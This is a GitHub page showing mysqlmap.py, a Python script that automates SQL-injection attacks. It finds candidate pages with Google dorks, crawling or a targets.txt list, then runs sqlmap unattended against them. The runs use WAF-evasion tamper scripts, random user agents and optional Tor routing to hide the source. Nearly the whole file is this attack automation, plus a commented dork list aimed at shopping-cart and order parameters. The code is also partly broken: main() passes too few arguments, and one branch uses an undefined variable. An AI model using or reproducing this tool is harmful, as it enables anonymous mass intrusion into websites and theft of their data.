-
Notifications
You must be signed in to change notification settings - Fork 45
/
Copy pathmysqlmap.py
186 lines (177 loc) · 14.7 KB
/
mysqlmap.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
#works in python 3(selenium changed version,that's myenv)
#coz line53 & line73 use a function from a py3 module,but
#that is not necessary
#in this script file in sqlmap_string,added --tor --tor-type=socks5 --check-tor ,
#other way to add the same effort is:proxychains sqlmap ...
#but this needs the system install proxychains,kali linux2.0 has already installed it,yet
#another way:sqlmap --proxy=socks5://127.0.0.1:9050 (with tor installed in the system)
#
#/root/myenv2/bin/python3.5m is the normal python3
#/root/myenv/bin/python3.5 is the changed GoogleScraper script version python
import os
import re
def static_sqli(url):
#re.search("",url)
pass
def sqlmap_g_nohuman(http_url_or_file,tor_or_not,post_or_not):
#this function use sqlmap's "-g" option to find sqli urls,but this "-g"
#option can only get 100 results due to google api restriction,but in
#this mode,there is no need for us human to handle any situation.
if re.match("(http://)|(https://)",http_url_or_file):
domain_url=http_url_or_file[7:] if re.match("(http://)",http_url_or_file) else http_url_or_file[8:]
sqlmap_string='''/usr/share/sqlmap/sqlmap.py -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (domain_url,http_url_or_file)
forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (domain_url,http_url_or_file)
tor_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (domain_url,http_url_or_file)
tor_forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (domain_url,http_url_or_file)
#print("sqlmap_string is:%s" % sqlmap_string)
#sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -g site:%s allinurl:"php"|"php page="|"php id="|"php tid="|"php pid="|"php cid="|"php path="|"php cmd="|"php file="|"php cartId="|"php bookid="|"php num="|"php idProduct="|"php ProdId="|"php idCategory="|"php intProdID="|"cfm storeid="|"php catid="|"php cart_id="|"php order_id="|"php catalogid="|"php item="|"php title="|"php CategoryID="|"php action="|"php newsID="|"php newsid="|"php product_id="|"php cat="|"php parent_id="|"php view="|"php itemid="'''
if tor_or_not==False:
print("sqlmap_string is:%s" % sqlmap_string)
print("forms_sqlmap_string is:%s" % forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % forms_sqlmap_string)
elif tor_or_not==True:
print("tor_sqlmap_string is:%s" % tor_sqlmap_string)
print("tor_forms_sqlmap_string is:%s" % tor_forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % tor_sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % tor_forms_sqlmap_string)
else:
fp=open(http_url_or_file,"r+")
all_urls=fp.readlines()
fp.close()
for each in all_urls:
domain_url=each[7:] if re.match("(http://)",each) else each[8:]
sqlmap_string='''/usr/share/sqlmap/sqlmap.py -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (domain_url,each)
forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (domain_url,each)
tor_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (domain_url,each)
tor_forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -g "site:%s inurl:php|asp|aspx|jsp" --delay 2 --smart --batch -v 4 --threads 4 --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (domain_url,each)
#print("sqlmap_string is:%s" % sqlmap_string)
#sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -g site:%s allinurl:"php"|"php page="|"php id="|"php tid="|"php pid="|"php cid="|"php path="|"php cmd="|"php file="|"php cartId="|"php bookid="|"php num="|"php idProduct="|"php ProdId="|"php idCategory="|"php intProdID="|"cfm storeid="|"php catid="|"php cart_id="|"php order_id="|"php catalogid="|"php item="|"php title="|"php CategoryID="|"php action="|"php newsID="|"php newsid="|"php product_id="|"php cat="|"php parent_id="|"php view="|"php itemid="'''
if tor_or_not==False:
print("sqlmap_string is:%s" % sqlmap_string)
print("forms_sqlmap_string is:%s" % forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % forms_sqlmap_string)
elif tor_or_not==True:
print("tor_sqlmap_string is:%s" % tor_sqlmap_string)
print("tor_forms_sqlmap_string is:%s" % tor_forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % tor_sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % tor_forms_sqlmap_string)
def sqlmap_craw(origin_http_url_or_file,tor_or_not,post_or_not):
#this function use sqlmap's "--crawl" option to find sqli urls.
if re.match("(http://)|(https://)",origin_http_url_or_file):
origin_http_url=re.sub(r'(\s)',"",origin_http_url_or_file)
sqlmap_string='''/usr/share/sqlmap/sqlmap.py -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (origin_http_url,origin_http_url)
forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (origin_http_url,origin_http_url)
tor_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (origin_http_url,origin_http_url)
tor_forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (origin_http_url,origin_http_url)
#print("sqlmap_string is:%s" % sqlmap_string)
if tor_or_not==False:
print("sqlmap_string is:%s" % sqlmap_string)
print("forms_sqlmap_string is:%s" % forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % forms_sqlmap_string)
elif tor_or_not==True:
print("tor_sqlmap_string is:%s" % tor_sqlmap_string)
print("tor_forms_sqlmap_string is:%s" % tor_forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % tor_sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % tor_forms_sqlmap_string)
else:
fp=open(origin_http_url_or_file,"r+")
all_urls=fp.readlines()
fp.close()
for each in all_urls:
origin_http_url=re.sub(r'(\s)',"",each)
sqlmap_string='''/usr/share/sqlmap/sqlmap.py -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (origin_http_url,origin_http_url)
forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (origin_http_url,origin_http_url)
tor_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3''' % (origin_http_url,origin_http_url)
tor_forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -u "%s" --crawl=3 --delay 2 --smart -v 4 --threads 4 --batch --random-agent --safe-url "%s" --safe-freq 1 --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms''' % (origin_http_url,origin_http_url)
#print("sqlmap_string is %s" % sqlmap_string)
if tor_or_not==False:
print("sqlmap_string is:%s" % sqlmap_string)
print("forms_sqlmap_string is:%s" % forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % forms_sqlmap_string)
elif tor_or_not==True:
print("tor_sqlmap_string is:%s" % tor_sqlmap_string)
print("tor_forms_sqlmap_string is:%s" % tor_forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % tor_sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % tor_forms_sqlmap_string)
def sqlmap_g_human(http_url_or_file,tor_or_not,post_or_not):
#this function use myGoogleScraper to search google dork to get the full
#urls,in this mode,we need input the yanchengma by human,not robot,coz
#sqlmap's -g option can only get the former 100 results,this function will
#get almost the all results.
if re.match("(http://)|(https://)",http_url_or_file):
domain_url=http_url_or_file[7:] if re.match("(http://)",url_or_file) else http_url_or_file[8:]
query='''site:%s inurl:php|asp|aspx|jsp''' % domain_url
#import easy_search
#search_url_list=blew expression
#easy_search.myGoogleScraper_get_urls_from_query(query,"GoogleScraper_origin_http_domain_url_list")
os.system('''/root/myenv/bin/python3.5 easy_search.py "%s"''' % query)#here myenv/python3.5 is the selenium changed version
sqlmap_string='''/usr/share/sqlmap/sqlmap.py -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3'''
forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms'''
tor_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3'''
tor_forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms'''
#print("sqlmap_string is:%s" % sqlmap_string)
if tor_or_not==False:
print("sqlmap_string is:%s" % sqlmap_string)
print("forms_sqlmap_string is:%s" % forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % forms_sqlmap_string)
elif tor_or_not==True:
print("tor_sqlmap_string is:%s" % tor_sqlmap_string)
print("tor_forms_sqlmap_string is:%s" % tor_forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % tor_sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % tor_forms_sqlmap_string)
else:
#print(666666661111111)
try:
fp=open(http_url_or_file,"r+")
all_urls=fp.readlines()
#print("open file 666666")
print(55555)
print(all_urls)
fp.close()
for each in all_urls:
domain_url=each[7:] if re.match("(http://)",each) else each[8:]
print(6666)
print(domain_url)
query='''site:%s inurl:php|asp|aspx|jsp''' % domain_url
#import easy_search
#search_url_list=blew expression
#easy_search.myGoogleScraper_get_urls_from_query(query,"GoogleScraper_origin_http_domain_url_list")
os.system('''/root/myenv/bin/python3.5 easy_search.py "%s"''' % query)#here myenv/python3.5 is the selenium changed version
sqlmap_string='''/usr/share/sqlmap/sqlmap.py -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3'''
forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms'''
tor_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3'''
tor_forms_sqlmap_string='''/usr/share/sqlmap/sqlmap.py --tor --tor-type=socks5 --check-tor -m GoogleScraper_origin_http_domain_url_list.txt -v 4 --delay 2 --smart --batch --threads 4 --random-agent --tamper=between,space2randomblank,randomcase,xforwardedfor,charencode --level 3 --forms'''
#print("sqlmap_string is:%s" % sqlmap_string)
if tor_or_not==False:
print("sqlmap_string is:%s" % sqlmap_string)
print("forms_sqlmap_string is:%s" % forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % forms_sqlmap_string)
elif tor_or_not==True:
print("tor_sqlmap_string is:%s" % tor_sqlmap_string)
print("tor_forms_sqlmap_string is:%s" % tor_forms_sqlmap_string)
os.system("/usr/bin/python2.7 %s" % tor_sqlmap_string)
if post_or_not==True:
os.system("/usr/bin/python2.7 %s" % tor_forms_sqlmap_string)
except:
print("open file error")
def main():
sqlmap_g_human("targets.txt",False)
if __name__ == '__main__':
main()